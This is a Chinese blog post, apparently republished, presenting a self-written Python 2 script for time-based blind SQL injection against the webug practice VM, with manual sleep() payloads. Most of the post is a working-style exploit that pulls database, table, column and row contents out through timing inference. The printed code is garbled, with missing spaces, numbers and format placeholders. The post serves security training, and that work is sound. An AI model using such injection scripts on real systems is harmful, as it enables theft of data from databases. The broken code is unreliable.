用Python自定义打造的时间盲注脚本

推荐一个自带很多web的入门练习虚拟机--webug,网上有资源,如果嫌大可以找Johnson。

最近johnson在测试webug上的一个时间盲注的时候,就想着自己写一个脚本。

访问页面是这样的:

提示说传一个type的参数进行

参数变了,页面也会跟着变化,既然是时间注入,就自己手动测试一下。

Payload1:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='a',sleep(3),1)

页面直接刷新了,最后不断的尝试,发现当payload为:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='p',sleep(3),1)的时候,页面会暂停3秒,所以数据库的第一个字母是p,为了锻炼自己,手动写了一个简单的,冗余非常大的脚本。

#!/usr/bin/env python

# encoding: utf-8

"""

@version: V1.0

@author: johnson

@file: bool_time.py

@time: 1/2/18 4:24 PM

"""

importrequests

importtime

s =3#设置延时的秒数

#主函数

defmain():

url =raw_input("Please input url:")#输入需要测试的地址

# # url = "http://192.168.1.105/pentest/test/time/?type=1"

payloads ="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,"

print"start get length..."

length = getDatabaseLength(url)#获取数据库的长度

print"start database sql injection..."

database = getDatabaseName(url,length,payloads)#获取数据库的名字

print"the current database is "+ database

print"start get table count..."

table_count = getTableCount(url,database)#获取表的数量

print"the database %s's table count is %d"% (database,table_count)

print"start get table length..."

# table_count = 4

table_length = (getTableLength(url,table_count,database))#获取表的长度

printtable_length

print"start table sql injection..."

tables = getTableName(url,payloads,database,table_length)#获取表名

print"table name is "

printName(tables)

break_while ='Y'

#循环查看表的结构

whilebreak_while =='Y'orbreak_while =='y':

table_name =raw_input("Please input table name:")

columns = getColumnName(url,table_name,database,payloads)#获取指定表的列名

print"column name is "

printName(columns)

break_while =raw_input("Do you want to inject other table name?(Y/n)")

ifbreak_whileisNone:

break_while ='Y'

ifbreak_while =='n'orbreak_while =='N':

get_data =raw_input("Do you want to test other column?(Y/n)")

ifget_data =='Y'orget_data =='y':

column_name =raw_input("Please input column name:")

getDatas(url,payloads,table_name,column_name)#获取指定表指定列的数据

break

else:

break_while ='N'

#获取当前数据库长度

defgetDatabaseLength(url):

foriinrange(1,50):

start_time = time.time()

url1 =" and if(length(database())=, sleep(),1)%23".format(url=url,i=i,s=s)

#print url1

requests.get(url1)

iftime.time() - start_time > s-1:

print"the length is "+str(i)

returni

#获取当前数据库的名字

defgetDatabaseName(url,length,payloads):

database =""

fordinrange(1,length +1):

forpayloadinpayloads:

start_time = time.time()

url2 =" and if(substr(database(), ,1)='', sleep(),1)%23".format(url=url,d=d,payload=payload,s=s)

requests.get(url2)

iftime.time() - start_time > s-1:

database += payload

printdatabase

break

returndatabase

#获取指定数据库的表数量

defgetTableCount(url,database):

table_count =

forcountinrange(1,50):

start_time_of_table_count = time.time()

url_get_count =" and if(substr((select count(*) from information_schema.tables where table_schema=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,count= count)

requests.get(url_get_count)

#print urlGetCount

iftime.time() - start_time_of_table_count > s-1:

table_count = count

break

returntable_count

#获取指定数据库的所有表长度

defgetTableLength(url,table_count,database):

table_length = []

forcountinrange(,table_count):

foriinrange(1,21):

start_time_of_table_length = time.time()

url3 =" and if(substr((select length(table_name) from information_schema.tables where table_schema='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,count= count,i= i,s= s)

#print url3

requests.get(url3)

iftime.time() - start_time_of_table_length > s-1:

table_length.append(i)

print"the table '%d' length is %s"% (count+1,i)

break

returntable_length

#获取表名字

defgetTableName(url,payloads,database,table_length):

tables = []

foriinrange(,len(table_length)):

table =""

fordinrange(1,table_length[i]+1):

forpayloadinpayloads:

start_time_of_table_name = time.time()

url4 =" and if(substr((select table_name from information_schema.tables where table_schema='' limit ,1),'',1) = '', sleep(),1)".format(url= url,i= i,d= d,payload= payload,database= database,s= s)

requests.get(url4)

iftime.time() - start_time_of_table_name > s-1:

table += payload

printtable

break

tables.append(table)

returntables

#输出名字

defprintName(result):

foriinrange(,len(result)):

printresult[i]

#获取指定表的列的数量

defgetColumnCount(url,table_name,database):

column_count =

forcountinrange(1,50):

start_time_of_column_count = time.time()

url_get_column_count =" and if(substr((select count(*) from information_schema.columns where table_schema='' and table_name=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,table_name=table_name,count= count)

requests.get(url_get_column_count)

# print urlGetColumnCount

iftime.time() - start_time_of_column_count > s-1:

column_count = count

break

returncolumn_count

#获取指定表列的长度

defgetColumnLen(url,column_count,database,table_name):

column_length = []

forcountinrange(,column_count):

foriinrange(1,21):

start_time = time.time()

get_url=" and if(substr((select length(column_name) from information_schema.columns where table_schema='' and table_name='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,table_name=table_name,count= count,i= i,s= s)

#print getURL

requests.get(get_url)

iftime.time() - start_time > s-1:

column_length.append(i)

print"the column '%d' length is %s"% (count+1,i)

break

returncolumn_length

#获取列名

defgetColumnName(url,table_name,database,payloads):

column_names = []

column_count = getColumnCount(url,table_name,database)

printcolumn_count

column_len = getColumnLen(url,column_count,database,table_name)

forkinrange(,len(column_len)):

column =""

fordinrange(1,column_len[k]+1):

forpayloadinpayloads:

start_time = time.time()

url4 =" and if(substr((select column_name from information_schema.columns where table_schema='' and table_name='' limit ,1),'',1) = '', sleep(),1)%23".format(

url=url,database=database,table_name=table_name,i=k,d=d,payload=payload,s=s)

requests.get(url4)

iftime.time() - start_time > s -1:

column += payload

printcolumn

break

column_names.append(column)

returncolumn_names

#获取指定列的数据数量

defgetDataCount(url,table_name,column_name):

data_count =

forcountinrange(1,50):

start_time = time.time()

url_get_data_count =" and if(substr((select count(*) from ),1,1) = , sleep(),1)%23".format(

url=url,column_name=column_name,s=s,table_name=table_name,count=count)

requests.get(url_get_data_count)

# print urlGetColumnCount

iftime.time() - start_time > s -1:

data_count = count

break

returndata_count

#获取指定列的数据长度

defgetDataLen(url,table_name,column_name,id):

data_len =

forlinrange(,100000):

start_time_of_get_data_len = time.time()

get_data_len_url =" and if(substr((select length() from limit ,1)=,1,1), sleep(),1)%23".format(s= s,l= l,id= id,table_name= table_name,column_name= column_name,url= url)

requests.get(get_data_len_url)

# print get_data_len_url

iftime.time() - start_time_of_get_data_len > s -1:

print"the data '%d' length is %d"% (id,l)

data_len = l

break

returndata_len

#获取数据

defgetDatas(url,payloads,table_name,column_name):

datas = []

data_count = getDataCount(url,table_name,column_name)

print"the data's count is %d"% (data_count)

foriinrange(,data_count):

data =""

data_len = getDataLen(url,table_name,column_name,i)

print"the data's len is %d"% (data_len)

forjinrange(,data_len +1):

forpayloadinpayloads:

start_time = time.time()

url_of_get_datas =" and if(substr((select from limit ,1),,1)='', sleep(),1)%23".format(url=url,column_name=column_name,table_name=table_name,payload=payload,j=j,s=s,i=i)

requests.get(url_of_get_datas)

iftime.time() - start_time > s -1:

data += payload

printdata

break

datas.append(data)

if__name__ =='__main__':

main()

最后的结果就是:

代码写的比较随意,只是希望多交流学习

本文来自企鹅号 - 计科信安媒体

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏IT派

爬虫大神,又出新招

几乎所有玩爬虫的人,一定会用requests库,这个库的作者是大名鼎鼎的Kenneth Reitz 。牛逼的一塌糊涂,最近我浏览它的网站,发现他又出新招,一个把...

983
来自专栏about云

spark2 sql读取json文件的格式要求

问题导读 1.spark2 sql如何读取json文件? 2.spark2读取json格式文件有什么要求? 3.spark2是如何处理对于带有表名信息的jso...

3497
来自专栏大数据杂谈

用Python爬虫获取自己感兴趣的博客文章

1639
来自专栏ChaMd5安全团队

360春秋杯3道web题的简单分析

360春秋杯3道web题的简单分析 From ChaMd5安全团队核心成员 pcat&香香 where is my cat 这题一开始很坑的,存在着/.git/...

4028
来自专栏知无涯

【教程】快速入门,十天学会ASP

4058
来自专栏FreeBuf

对自助提卡系统的一次代码审计

并非有意愿要审计该站,前面的走的黑盒没有过于精彩部分就不在贴上了,对于此系统站你们懂的,多说无益,这套程序是开源的,像这种自助提卡系统相信大家已经不在陌生了,很...

723
来自专栏技术/开源

开源API集成测试工具 Hitchhiker v0.1.3 - 参数化请求

Hitchhiker 是一款开源的 Restful Api 集成测试工具,你可以轻松部署到本地,和你的team成员一起管理Api。

773
来自专栏技术/开源

开源API集成测试工具 Hitchhiker v0.1.3 - 参数化请求

Hitchhiker 是一款开源的 Restful Api 集成测试工具,你可以轻松部署到本地,和你的team成员一起管理Api。 详细介绍请看: https:...

1845
来自专栏北京马哥教育

爬虫大神,又出新招

1405
来自专栏未闻Code

不用甘特图,你做什么项目管理

当你根据以上的规则绘制好第一版甘特图以后,你会发现有些地方是可以继续调整的,但是这种调整,在你没有画图之前是不能发现的。于是你会在调整甘特图的过程中,让项目的规...

841

扫码关注云+社区